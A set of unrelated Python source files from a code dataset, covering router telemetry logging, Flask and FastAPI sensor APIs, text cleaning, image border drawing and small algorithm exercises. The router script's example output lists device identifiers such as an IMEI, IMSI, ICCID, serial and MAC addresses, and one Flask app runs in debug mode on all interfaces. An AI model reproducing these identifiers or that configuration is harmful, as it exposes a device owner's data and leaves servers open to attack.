%s\" % testName)\n self.assertAlmostEqual(rlnAngles[1], tilt, places=2,msg=\"Tilt not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnAngles[2], psi, places=2,msg=\"Psi not expected for direct %s\" % testName)\n\n self.assertAlmostEqual(rlnShifts[0], xShift, places=2,msg=\"xShift not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnShifts[1], yShift, places=2,msg=\"yShift not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnShifts[2], zShift, places=2,msg=\"zShift not expected for direct %s\" % testName)\n\n print(\"This conversion worked both sides.\")\n print(\"Relion values: %s, %s, %s %s, %s, %s\" % (xShift, yShift, zShift, rot, tilt, psi))\n print(\"Scipion transformation matrix:\\n%s\\n\\n\" % np.array_str(alignmentMatrix, precision=2, suppress_small=True))\n\n\n\n\n","repo_name":"scipion-em/scipion-em-reliontomo","sub_path":"reliontomo/tests/test_conversion.py","file_name":"test_conversion.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74619857475","text":"#392. is Subsequence\n#Difficulty: Easy\n\n'''\nGiven two strings s and t, return true if s is a subsequence of t, or false otherwise.\n\nA subsequence of a string is a new string that is formed from the original string by deleting some (can be none) \nof the characters without disturbing the relative positions of the remaining characters. \n(i.e., \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n\nStatus: Completed\nNotes: This took way longer than it should have lol. Better solution in description of one of the solutions but sticking with mine fn\n'''\ndef isSubsequence(s: str, t: str):\n for i in range(len(s)): #could have just done i in s\n lastIndex = t.find(s[i]) \n t = t[lastIndex+1:]\n \n if lastIndex <= -1:\n return False\n return True\nprint(isSubsequence(\"aaaaaa\",\"bbaaaa\"))\n","repo_name":"ChoyonUddin/LeetCode","sub_path":"Completed/isSubsequence.py","file_name":"isSubsequence.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41573964981","text":"import textblob\r\nimport json\r\nfrom textblob import TextBlob\r\nfrom textblob import Word\r\nfrom textblob.classifiers import NaiveBayesClassifier\r\n\r\n'''\r\nTests :\r\nwiki = \"I was enjoying eating apples. She is no longer loved\"\r\ntestfr = \"J'aime manger les pommes de mon jardin\"\r\ntweettest = \"RT @Sifaoui: 1\\ufe0f\\u20e3In their translation of @EmmanuelMacron's speeches, the @AlJazeera propagandists knowingly made the French president say \\u201cI\\u2026\"\r\nblob = TextBlob(\"Comment vas-tu?\")\r\n'''\r\n\r\nwith open('StopWord/stop_words_english.json', encoding=\"utf8\") as mon_fichier:\r\n stop_words_en = json.load(mon_fichier)\r\n\r\nwith open('StopWord/stop_words_french.json', encoding=\"utf8\") as mon_fichier:\r\n stop_words_fr = json.load(mon_fichier)\r\n\r\n\r\ndef filtreCaracteres(text):\r\n \"\"\"\r\n entrée : text (str)\r\n sortie : lp (str)\r\n Retire les caractères spéciaux d'un texte (format string) tels que les emojis\r\n \"\"\"\r\n\r\n l = list(text)\r\n lp = \"\"\r\n for x in l:\r\n if ord('x') <= 55295:\r\n lp += x\r\n return lp\r\n\r\n\r\ndef retireHttp(text):\r\n \"\"\"\r\n entrée : text (str)\r\n sortie : (str)\r\n Retire les liens http d'un texte (format string)\r\n \"\"\"\r\n l = text.split(\" \")\r\n resultat = \"\"\r\n for mot in l:\r\n isHttp = mot[0:5] == \"http:\" or mot[0:6] == \"https:\"\r\n if not isHttp:\r\n resultat += mot + \" \"\r\n return resultat[:-1]\r\n\r\n\r\ndef retireAt(text):\r\n \"\"\"\r\n entrée : text (str)\r\n sortie : (str)\r\n Retire les arobases\r\n \"\"\"\r\n return text.replace(\"@\", \"\")\r\n\r\n\r\ndef retireRetourLigne(text):\r\n \"\"\"\r\n entrée : text (str)\r\n sortie : (str)\r\n Retire les retours à la ligne\r\n \"\"\"\r\n return text.replace(\"\\n\", \"\")\r\n\r\n\r\ndef lemmatizeSentence(text):\r\n \"\"\"\r\n entrée : text (str)\r\n sortie : (str)\r\n Lemmatize une phrase et renvoie la chaine de caractere \"propre\" (text=une phrase)\r\n \"\"\"\r\n wordTag = text.tags\r\n l = \"\"\r\n for (mot, tag) in wordTag:\r\n motLemmatise = \"\"\r\n if tag[0] != 'V':\r\n motLemmatise = Word(mot).lemmatize()\r\n else:\r\n motLemmatise = Word(mot).lemmatize()\r\n if motLemmatise not in []:\r\n l += motLemmatise + \" \"\r\n return l[:-1]\r\n\r\n\r\ndef trilangueepuration(tweetcomplexe):\r\n \"\"\"\r\n entrée : text (str)\r\n sortie : S (str)\r\n Prends une chaîne de caracteres privée d'émojis/liens ... et renvoie le tweet lematizé\r\n \"\"\"\r\n tweet = TextBlob(tweetcomplexe)\r\n\r\n S = \"\"\r\n for phrase in tweet.sentences:\r\n S += \" \" + lemmatizeSentence(phrase) + \".\"\r\n return S\r\n\r\n\r\ndef tweetpropre(tweetbrut):\r\n \"\"\"\r\n entrée : tweetbrut (str)\r\n sortie : (str)\r\n prend en parametre un tweet brut et retourne une chaine de caractere lemmatize\r\n (composée de filtreCaracteres, retireAt, retireHttp, retireRetourLigne, trilangueepuration)\r\n \"\"\"\r\n tweetsanscarac = retireAt(filtreCaracteres(tweetbrut))\r\n tweetsanscarachttp = retireHttp(tweetsanscarac)\r\n twsanscarhttpligne = retireRetourLigne(tweetsanscarachttp)\r\n return trilangueepuration(twsanscarhttpligne)\r\n","repo_name":"markpiquant/insult_detector","sub_path":"process_tweet.py","file_name":"process_tweet.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22852608765","text":"#!/usr/bin/env python3\n\"\"\"\nExample code on how to print ~all info about your router, you can try it by running:\npython3 data_dump.py http://admin:PASSWORD@192.168.8.1/\n\"\"\"\nfrom argparse import ArgumentParser\nimport os.path\nimport re\nimport pprint\nimport sys\nfrom typing import Any, Callable\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), os.path.pardir))\n\nfrom huawei_lte_api.Client import Client # noqa: E402\nfrom huawei_lte_api.Connection import Connection # noqa: E402\n\nfrom influxdb import InfluxDBClient\n\n\ninflux_client = InfluxDBClient(host='localhost', port=8086)\ninflux_client.switch_database('mydb') \n\n\nparser = ArgumentParser()\nparser.add_argument('url', type=str)\nparser.add_argument('--username', type=str)\nparser.add_argument('--password', type=str)\nargs = parser.parse_args()\nkeys_to_convert = ['CurrentConnectTime', 'CurrentUpload', 'CurrentDownload', 'CurrentDownloadRate', 'CurrentUploadRate', 'TotalUpload', 'TotalDownload', 'TotalConnectTime', 'showtraffic', 'MaxUploadRate', 'MaxDownloadRate','ConnectionStatus','CurrentNetworkType','CurrentNetworkTypeEx','CurrentServiceDomain','CurrentWifiUser','RoamingStatus','ServiceStatus','SignalIcon','cellroam' ]\n\n\nwith Connection(args.url, username=args.username, password=args.password) as connection:\n client = Client(connection)\n \n device_info = client.monitoring.traffic_statistics()\n device_info.update(client.monitoring.status())\n device_info.update(client.device.signal())\n \n device_tags = client.device.information()\n device_signal = client.device.signal()\n \n rsrp = re.findall(r'-\\d+', device_signal.get('rsrp')).pop(0)\n rsrq = re.findall(r'-\\d+.\\d+', device_signal.get('rsrq')).pop(0)\n \n rssi = re.findall(r'-\\d+', device_signal.get('rssi')).pop(0)\n sinr = re.findall(r'\\d+', device_signal.get('sinr')).pop(0)\n \n for key in keys_to_convert:\n if key in device_info:\n device_info[key] = int(device_info[key])\n # Convert data into a format suitable for InfluxDB\n\n json_body_traffic = [\n {\n \"measurement\": \"hueawei_router_traffic\",\n \"tags\": device_tags\n ,\n \"fields\": device_info\n }\n ]\n influx_client.write_points(json_body_traffic)\n\n json_body_signal = [\n {\n \"measurement\": \"hueawei_signal\",\n \"tags\": device_tags\n ,\n \"fields\": {\n \"rsrp\":float(rsrp),\n \"rsrq\":float(rsrq),\n \"rssi\":float(rssi),\n \"sinr\":float(sinr),\n }\n }\n ]\n influx_client.write_points(json_body_signal)\n\n pprint.pprint( json_body_traffic)\n pprint.pprint( json_body_signal)\n \n\"\"\"\nExample of data to be written to influx\n\n[{'fields': {'BatteryLevel': None,\n 'BatteryPercent': None,\n 'BatteryStatus': None,\n 'ConnectionStatus': 901,\n 'CurrentConnectTime': 16152,\n 'CurrentDownload': 595291481,\n 'CurrentDownloadRate': 9714,\n 'CurrentNetworkType': 19,\n 'CurrentNetworkTypeEx': 1011,\n 'CurrentServiceDomain': 3,\n 'CurrentUpload': 174116890,\n 'CurrentUploadRate': 5273,\n 'CurrentWifiUser': 0,\n 'MaxDownloadRate': 8371358,\n 'MaxUploadRate': 622425,\n 'PrimaryDns': '41.1.240.29',\n 'PrimaryIPv6Dns': None,\n 'RoamingStatus': 0,\n 'SecondaryDns': '41.1.239.253',\n 'SecondaryIPv6Dns': None,\n 'ServiceStatus': 2,\n 'SignalIcon': 5,\n 'SignalStrength': None,\n 'SimStatus': '1',\n 'TotalConnectTime': 1789048,\n 'TotalDownload': 8011565266,\n 'TotalUpload': 984422899,\n 'TotalWifiUser': '64',\n 'WifiConnectionStatus': None,\n 'WifiStatus': '0',\n 'WifiStatusExCustom': '0',\n 'arfcn': None,\n 'band': '3',\n 'bsic': None,\n 'cell_id': '29458206',\n 'cellroam': 1,\n 'classify': 'cpe',\n 'cqi0': '12',\n 'cqi1': '8',\n 'currenttotalwifiuser': '0',\n 'dl_mcs': 'mcsDownCarrier1Code0:15 mcsDownCarrier1Code1:16',\n 'dlbandwidth': '10MHz',\n 'dlfrequency': '1862600kHz',\n 'earfcn': 'DL:1776 UL:19776',\n 'ecio': None,\n 'enodeb_id': '0115071',\n 'flymode': '0',\n 'hvdcp_online': '0',\n 'ims': '0',\n 'lac': None,\n 'ltedlfreq': '18626',\n 'lteulfreq': '17676',\n 'maxsignal': '5',\n 'mode': '7',\n 'nei_cellid': None,\n 'pci': '266',\n 'plmn': '65501',\n 'rac': None,\n 'rrc_status': None,\n 'rscp': None,\n 'rsrp': '-79dBm',\n 'rsrq': '-8.0dB',\n 'rssi': '-57dBm',\n 'rxlev': None,\n 'sc': None,\n 'showtraffic': 1,\n 'simlockStatus': '0',\n 'sinr': '7dB',\n 'speedLimitStatus': '0',\n 'tac': '20006',\n 'tdd': None,\n 'transmode': 'TM[4]',\n 'txpower': 'PPusch:2dBm PPucch:-6dBm PSrs:0dBm PPrach:-7dBm',\n 'ul_mcs': 'mcsUpCarrier1:23',\n 'ulbandwidth': '10MHz',\n 'ulfrequency': '1767600kHz',\n 'usbup': '0',\n 'wdlfreq': None,\n 'wififrequence': '0',\n 'wifiindooronly': '0',\n 'wifiswitchstatus': '1'},\n 'measurement': 'hueawei_router_traffic',\n 'tags': {'Classify': 'cpe',\n 'DeviceName': 'B535-932',\n 'HardwareVersion': 'WL2B535M',\n 'Iccid': '89330000000029032674',\n 'Imei': '860415043074029',\n 'ImeiSvn': '09',\n 'Imsi': '655013302902967',\n 'MacAddress1': '6C:06:D6:AB:D6:3A',\n 'MacAddress2': None,\n 'Mccmnc': '65501',\n 'Msisdn': None,\n 'ProductFamily': 'LTE',\n 'SerialNumber': 'SHTUT20512000641',\n 'SoftwareVersion': '10.0.5.1(H195SP2C983)',\n 'WanIPAddress': '100.77.223.36',\n 'WanIPv6Address': None,\n 'WebUIVersion': 'WEBUI 10.0.5.1(W2SP2C7601)',\n 'WifiMacAddrWl0': '6C:06:D6:AB:D6:3B',\n 'WifiMacAddrWl1': '6C:06:D6:AB:D6:40',\n 'iniversion': 'B535-932-CUST 10.0.2.2(C1232)',\n 'spreadname_en': 'Huawei 4G Router 3 Pro',\n 'spreadname_zh': '华为4G路由3 Pro',\n 'submask': '255.255.255.255',\n 'supportmode': 'LTE|WCDMA|GSM',\n 'uptime': '16184',\n 'wan_dns_address': '41.1.240.29,41.1.239.253',\n 'wan_ipv6_dns_address': None,\n 'workmode': 'LTE'}}]\n[{'fields': {'rsrp': -79.0, 'rsrq': -8.0, 'rssi': -57.0, 'sinr': 7.0},\n 'measurement': 'hueawei_signal',\n 'tags': {'Classify': 'cpe',\n 'DeviceName': 'B535-932',\n 'HardwareVersion': 'WL2B535M',\n 'Iccid': '89330000000029032674',\n 'Imei': '860415043074029',\n 'ImeiSvn': '09',\n 'Imsi': '655013302902967',\n 'MacAddress1': '6C:06:D6:AB:D6:3A',\n 'MacAddress2': None,\n 'Mccmnc': '65501',\n 'Msisdn': None,\n 'ProductFamily': 'LTE',\n 'SerialNumber': 'SHTUT20512000641',\n 'SoftwareVersion': '10.0.5.1(H195SP2C983)',\n 'WanIPAddress': '100.77.223.36',\n 'WanIPv6Address': None,\n 'WebUIVersion': 'WEBUI 10.0.5.1(W2SP2C7601)',\n 'WifiMacAddrWl0': '6C:06:D6:AB:D6:3B',\n 'WifiMacAddrWl1': '6C:06:D6:AB:D6:40',\n 'iniversion': 'B535-932-CUST 10.0.2.2(C1232)',\n 'spreadname_en': 'Huawei 4G Router 3 Pro',\n 'spreadname_zh': '华为4G路由3 Pro',\n 'submask': '255.255.255.255',\n 'supportmode': 'LTE|WCDMA|GSM',\n 'uptime': '16184',\n 'wan_dns_address': '41.1.240.29,41.1.239.253',\n 'wan_ipv6_dns_address': None,\n 'workmode': 'LTE'}}]\n\"\"\"","repo_name":"splitpoint-za/huawei-lte-api-3.5.3-backport","sub_path":"examples/write_influxdb.py","file_name":"write_influxdb.py","file_ext":"py","file_size_in_byte":8106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"41456616413","text":"from xmg.compgen.BrickSpec import BrickSpec, Plug\n\nclass StardimBrickSpec(BrickSpec):\n\n def __init__(self, name, brick_name, plugs):\n self.proxy = plugs[\"proxy\"]\n del plugs[\"proxy\"]\n super().__init__(name, brick_name, plugs)\n\n def deref_plugs(self, table):\n proxy = table[self.proxy]\n ctrl = proxy.control_name\n self.tag = proxy.tag\n self.plugs[\"_Constraint\"] = [Plug(ctrl + \"._Stmt\")]\n super().deref_plugs(table)\n\n def init_brick(self, brick):\n brick._text = \"\"\"\n%%%%\n\nStmt : _Stmt '*=' _Constraint {$$=control:and($1,dim:dim('%s',$3))} ;\n\n%%%%\n\"\"\" % self.tag\n","repo_name":"spetitjean/XMG-2","sub_path":"contributions/compat/bricks/stardim/pylib/brickspec.py","file_name":"brickspec.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"33241445251","text":"from flask import Flask, render_template , Response , request , jsonify\nimport pandas as pd\nimport time\nimport random as rd\nfrom path import heart_beat_csv,location_csv#sample data for testing\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('home.html')\n\n#apis\n\n@app.route('/api/heartbeat', methods=['GET'])\ndef heartbeat():\n if request.method == 'GET':\n t = time.localtime(time.time())\n return jsonify([[t.tm_sec,rd.randint(80.0, 88.0)]])\n\n@app.route('/api/cell', methods=['GET'])\ndef cell():\n if request.method == 'GET':\n t = time.localtime(time.time())\n return jsonify(rd.randint(56.0, 60.0))\n \n \n@app.route('/api/heartbeat-single', methods=['GET'])\ndef heartbeat_single():\n if request.method == 'GET':\n t = time.localtime(time.time())\n return jsonify([[t.tm_sec,rd.randint(80.0, 88.0)]])\n\n@app.route('/api/location', methods=['GET'])\ndef location():\n if request.method == 'GET':\n data = pd.read_csv(location_csv)\n out = data.to_dict(orient='records')\n return jsonify({'data': out})\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',debug=True,port=5000)","repo_name":"gamingflexer/telementary-dashboard","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"9904635454","text":"#!/usr/bin/env python3\n\nfrom sqlalchemy import create_engine\n\nfrom data_manager.orm import Base\n\n\ndef main():\n ################################\n # Step 1: Create the SQL engine\n ################################\n\n # More detailed info on used DB URL scheme (can also include username, password, etc.):\n # https://docs.sqlalchemy.org/en/20/core/engines.html#database-urls\n\n # Could be one a remote machine:\n # engine = create_engine(\"mysql://username@host:/database_name\")\n\n # For playing around, we can create an in-memory DB that only exists for\n # as long as our program is running\n # engine = create_engine(\"sqlite://\")\n\n # Create DB at absolute file path (4 leading slashes):\n # engine = create_engine(\"sqlite:////home/user/Documents/MyDB.sqlite\")\n\n # Create DB using a relative path (3 leading slashes)\n engine = create_engine(\"sqlite:///sampleDB.sqlite\")\n\n # Note: SQLite is the only DB where the DB itself is stored as a file. All other\n # backends require a daemon process to run on the target machine and those won't\n # create simple files for individual DBs\n\n ################################\n # Step 2: Initialize our DB\n ################################\n\n # Note: All the tables contained in data-manager are registered to this Base class\n # Therefore, it knows what tables shall exist and is able to (and responsible for)\n # create all tables that we need\n Base.metadata.create_all(engine)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KoehnLab/data-manager","sub_path":"demo/01_initialize_database.py","file_name":"01_initialize_database.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14784682817","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef get_iou_vector(A, B):\n batch_size = A.shape[0]\n metric = []\n for batch in range(batch_size):\n t, p = A[batch] > 0, B[batch] > 0\n # if np.count_nonzero(t) == 0 and np.count_nonzero(p) > 0:\n # metric.append(0)\n # continue\n # if np.count_nonzero(t) >= 1 and np.count_nonzero(p) == 0:\n # metric.append(0)\n # continue\n # if np.count_nonzero(t) == 0 and np.count_nonzero(p) == 0:\n # metric.append(1)\n # continue\n\n intersection = np.logical_and(t, p)\n union = np.logical_or(t, p)\n iou = (np.sum(intersection > 0) + 1e-10) / (np.sum(union > 0) + 1e-10)\n thresholds = np.arange(0.5, 1, 0.05)\n s = []\n for thresh in thresholds:\n s.append(iou > thresh)\n metric.append(np.mean(s))\n\n return np.mean(metric)\n\n\ndef my_iou_metric(label, pred):\n return tf.py_func(get_iou_vector, [label, pred > 0.5], tf.float64)\n\n\ndef my_iou_metric_2(label, pred):\n return tf.py_func(get_iou_vector, [label, pred > 0], tf.float64)","repo_name":"DzvinkaYarish/kaggle_tgs_salt_challenge","sub_path":"keras_data_analysis/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"34608462902","text":"from setup import app, write_client, read_api, geo, ORG, PARAMETERS, PARAMETERS_ENUM, BUCKET, BASE_DIR\nfrom fastapi.responses import ORJSONResponse\nfrom classes import Data, Dates\nfrom functions import get_query, list_all_items\nfrom pandas import read_json\nfrom uvicorn import run\nfrom io import StringIO\nimport json\n\n\n# -----------Routes-----------\n@app.post(\"/api/{param}/new/\", tags=[\"Add item\"], summary=\"Add new data to database\")\nasync def add_new_data(data: Data, param: PARAMETERS_ENUM):\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n data_df = read_json(StringIO(data.data), orient=\"split\").set_index('time')\n try:\n if param == \"openaq\":\n write_client.write(data_df, data_frame_measurement_name=\"openaqsensor\",\n data_frame_tag_columns=['country', 'country_code', 'id', 'region'])\n if param == \"wekeo\":\n write_client.write(\n data_df, data_frame_measurement_name=\"wekeosensor\", data_frame_tag_columns=['id'])\n return {\"message\": f\"{param} data succesfully added to database\"}\n except Exception as e:\n return {\"message\": f\"error with adding {param} data to database: {e}\"}\n\n\n@app.get(\"/api/locations/\", tags=[\"Latest data\"], summary=\"Get all used locations\")\nasync def locations():\n try:\n query = f\"\"\"import \"influxdata/influxdb/schema\"\n schema.tagValues(\n bucket: \"{BUCKET}\",\n tag: \"country_code\",\n start: 0,\n )\"\"\"\n response = read_api.query(query, org=ORG)\n\n country_codes = []\n for table in response:\n for record in table.records:\n country_codes.append(record.values['_value'])\n\n file = open(f\"{BASE_DIR}/country_codes.json\")\n country_codes_file = json.load(file)\n countries = []\n for country_code in country_codes:\n if country_code in country_codes_file:\n countries.append(\n {country_codes_file[country_code]: country_code})\n file.close()\n\n query = f\"\"\"import \"influxdata/influxdb/schema\"\n schema.tagValues(\n bucket: \"{BUCKET}\",\n tag: \"region\",\n start: 0\n )\"\"\"\n response = read_api.query(query, org=ORG)\n\n records_regions = []\n for table in response:\n for record in table.records:\n records_regions.append(record.values['_value'])\n\n data = []\n for country in countries:\n country_data = {}\n \n country_code = list(country.values())[0]\n country_name = list(country.keys())[0]\n country_data.update({\"country\": country_name})\n \n regions = []\n for region in records_regions:\n locations = geo.geocode(\n region, country_codes=country_codes, language=\"en\", timeout=10).raw[\"display_name\"]\n locations = locations.split(\", \")\n if locations[-1] == country_name:\n regions.append(locations[0])\n country_data.update({\"code\": country_code})\n country_data.update({\"regions\": regions})\n\n data.append({country_name: country_data})\n return ORJSONResponse(data, status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\n@app.get(\"/api/{param}/\", tags=[\"Latest data\"], summary=\"Get all latest data from all items from used parameter\")\nasync def data_by_param(param: PARAMETERS_ENUM):\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n try:\n query = get_query(param)\n response = read_api.query(query, org=ORG)\n return ORJSONResponse(list_all_items(response), status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\n@app.get(\"/api/{param}/{id}/\", tags=[\"Specific data (with timestamps)\"], summary=\"Get data from used parameter, filtered by id\")\nasync def all_data_by_param_and_id(param: PARAMETERS_ENUM, id: str, dates: Dates = None):\n # TIME FILTER FORMAT FOR REQUEST: 2023-11-15T12:00:00\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n if dates != None:\n start_date = f\"{dates.start_date}Z\"\n stop_date = f\"{dates.stop_date}Z\"\n else:\n start_date = None\n stop_date = None\n\n try:\n query = get_query(param=param, id=id,\n start_date=start_date, stop_date=stop_date)\n response = read_api.query(query, org=ORG)\n return ORJSONResponse(list_all_items(response, start_date, stop_date), status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\n@app.get(\"/api/{param}/{id}/{data}/\", tags=[\"Specific data (with timestamps)\"], summary=\"Get specific data from used parameter, filtered by id\")\nasync def specific_data_by_param_and_id(param: PARAMETERS_ENUM, id: str, data: str, dates: Dates = None):\n # TIME FILTER FORMAT FOR REQUEST: 2023-11-15T12:00:00\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n if dates != None:\n start_date = f\"{dates.start_date}Z\"\n stop_date = f\"{dates.stop_date}Z\"\n else:\n start_date = None\n stop_date = None\n\n try:\n query = get_query(param=param, id=id, data=data,\n start_date=start_date, stop_date=stop_date)\n response = read_api.query(query, org=ORG)\n return ORJSONResponse(list_all_items(response, start_date, stop_date), status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\nif __name__ == \"__main__\":\n run(\"main:app\", host=\"0.0.0.0\", port=6000, proxy_headers=True, forwarded_allow_ips=['*'], workers=2)\n","repo_name":"Sten-AP/AIrsight","sub_path":"backend/FastAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74214685633","text":"import cv2 as cv\nimport sys\nimport numpy as np\nfrom rembg import remove\nimport argparse\n\n\ndef correct(img,cb,v):\n T=0\n D=img.shape[0]\n L=0\n R=img.shape[1]\n t=cb[1] \n d=cb[3]\n l=cb[0]\n r=cb[2]\n if t>d:\n t,d=d,t \n if l>r:\n l,r=r,l\n l-=v\n t-=v\n d+=v \n r+=v \n if t<0:\n t=0\n if d>D:\n d=D\n if l<0:\n l=0\n if r>R:\n r=R\n return [l,t,r,d]\n \n \n \ndef makeBorder(img,cb):\n \n #img boundaries\n T=0\n D=img.shape[0]\n L=0\n R=img.shape[1]\n \n cb=correct(img,cb,0)\n #crop boundaries\n t=cb[1] #top\n d=cb[3] #bottom\n l=cb[0] #left\n r=cb[2] #right\n \n \n cropped=img[t:d,l:r]\n nbg=remove(cropped)\n \n red=np.array([0,0,255]) #red pixel\n bg=np.zeros(4)\n #bg=np.ones(4)\n bg+=100 #tolerating value of background pixel till 100(nearly black)\n #rather than 0(exact black) to smoothen the drawn border\n \n #horizontal processing\n for h in range(t,d):\n B=C=0 #B --> black pixel and C --> coloured pixel\n \n for w in range(l,r):\n \n if np.ndarray.all(np.less(nbg[h-t][w-l],bg)): #checks if a pixel is nearly black\n B+=1\n if C>9:\n C=0\n for i in range(10):\n if w+i9:\n B=0\n for i in range(10):\n if w-i>=L:\n img[h][w-i]=red\n \n \n #vertical processing\n for w in range(l,r):\n \n B=C=0\n for h in range(t,d):\n \n if np.ndarray.all(np.less(nbg[h-t][w-l],bg)):\n B+=1\n if C>9:\n C=0\n for i in range(10):\n if h+i9:\n B=0\n for i in range(10):\n if h-i>=T:\n img[h-i][w]=red\n \n return img.copy()\n \n# instead of using the default technique of replacing the entire region,\n# we only replace the drawn portion of the image which is faster and visually smooth than the selectROI provided by cv2\ndef redo(oldcb,image,drawn):\n oldcb=correct(image,oldcb,6)\n image[oldcb[1]:oldcb[3],oldcb[0]:oldcb[2]]=drawn[oldcb[1]:oldcb[3],oldcb[0]:oldcb[2]]\n \n\n# my version of simplified selectROI to implement q-->quit, c-->clear functionality smoothly\n# mainly to override behaviour of clicking c in cv.selectROI\ndef selectROI(event,x,y,flags,param):\n global ix,iy,drawing,image,cb,oldcb\n blue=np.array([255,0,0])\n if event == cv.EVENT_LBUTTONDOWN:\n if len(oldcb)==4:\n redo(oldcb,image,drawn) \n drawing = True\n ix,iy = x,y\n cb=[x,y]\n oldcb=[x,y]\n elif event == cv.EVENT_MOUSEMOVE:\n if drawing == True:\n if len(oldcb)==4:\n redo(oldcb,image,drawn)\n cv.rectangle(image,(ix,iy),(x,y),(255,0,0),5)\n oldcb=[ix,iy,x,y]\n elif event == cv.EVENT_LBUTTONUP:\n drawing = False\n if len(oldcb)==4:\n redo(oldcb,image,drawn)\n cv.rectangle(image,(ix,iy),(x,y),(255,0,0),5)\n oldcb=[ix,iy,x,y]\n if((x,y)==(ix,iy)):\n cb=[]\n oldcb=[]\n else:\n cb.append(x)\n cb.append(y)\n \n\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help =\"Path to the image\")\nap.add_argument(\"-o\", \"--output\", required = False, help =\"specify the output path of the image\")\nargs = vars(ap.parse_args())\n\ncb=[] #crop_boundaries\noldcb=[]\ndrawing = False\nix,iy = -1,-1\nf=args['image'].split('.')\no=args['output']\nfilename=f[0]\nextension=f[1]\noutput=filename+'_output.'+extension if o==None else o\n\ntry:\n image=cv.imread(args['image'])\nexcept:\n sys.exit('Failed to load image')\n \nprint('Use mouse to select a region by \"click and drag\"')\nprint('Press \"ENTER\" button to validate the region drawn by mouse')\nprint('Press \"c\" button to delete all borders and load original image')\nprint('Press \"s\" button to save the image with border')\nprint('Press \"q\" button to close or quit the script')\n\ndrawn=image.copy()\noriginal=image.copy()\ncv.namedWindow('image',cv.WINDOW_NORMAL)\ncv.setMouseCallback('image',selectROI)\nwhile(True):\n cv.imshow(\"image\", image)\n k=cv.waitKey(1)\n if k==ord('q') or k==ord('Q'):\n break\n elif k==13 and len(cb)==4:\n image=drawn.copy()\n drawn=makeBorder(image,cb)\n \n elif k==ord('c') or k==ord('C'):\n image=original.copy()\n drawn=original.copy()\n \n elif k==ord('s') or k==ord('S'):\n try:\n cv.imwrite(output,drawn)\n except:\n cv.imwrite(output+'.'+extension,drawn)\n\n\ncv.destroyAllWindows()\n\n","repo_name":"Jarosh-Antony/Auto-border-drawing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15649746405","text":"import os\r\nimport numpy as np\r\nimport re\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\nfrom math import radians, cos, sin, asin, sqrt\r\n\r\ndef cal_distance_meter(lat1, lng1, lat2, lng2):\r\n\r\n lng1, lat1, lng2, lat2 = map(radians, [lng1, lat1, lng2, lat2])\r\n\r\n d_lon = lng2-lng1\r\n\r\n d_lat = lat2-lat1\r\n\r\n a=sin(d_lat/2)**2 + cos(lat1) * cos(lat2) * sin(d_lon/2)**2\r\n\r\n dis=2*asin(sqrt(a))*6371*1000\r\n\r\n return dis\r\n\r\ndef judge_dis(dis1, dis2):\r\n return dis1 < 2000 or dis2 < 2000\r\n\r\ndef judge_time(t1, t2):\r\n return abs(int(t1)-int(t2)) <= 1\r\n\r\ndef get_lat_lon(id, lonlat_dict):\r\n values = lonlat_dict.get(int(id))\r\n\r\n if values == None:\r\n return 1.0, 1.0\r\n else:\r\n return values[0],values[1]\r\n\r\ndef cal_f1(filepath):\r\n print('------------------------------')\r\n print('dealing with file:', filepath)\r\n file = open(filepath,'r')\r\n our_error_lines = file.readlines()\r\n data_lines = open('./data/final_test/20111129.csv', 'r').readlines()\r\n test_line = open('./data/accident/n_11.29.csv', 'r',encoding=\"gb2312\").readlines()\r\n\r\n lonlat_matrix = np.loadtxt(r'./data/map/beijing.csv', delimiter = '\\t')\r\n lonlat_dict = {}\r\n for i in range(len(lonlat_matrix)):\r\n numbert = int(lonlat_matrix[i][0])\r\n lat = lonlat_matrix[i][1]\r\n lon = lonlat_matrix[i][2]\r\n lonlat_dict[numbert] = [lon,lat]\r\n\r\n TP1 = 0\r\n wrongset = set()\r\n\r\n 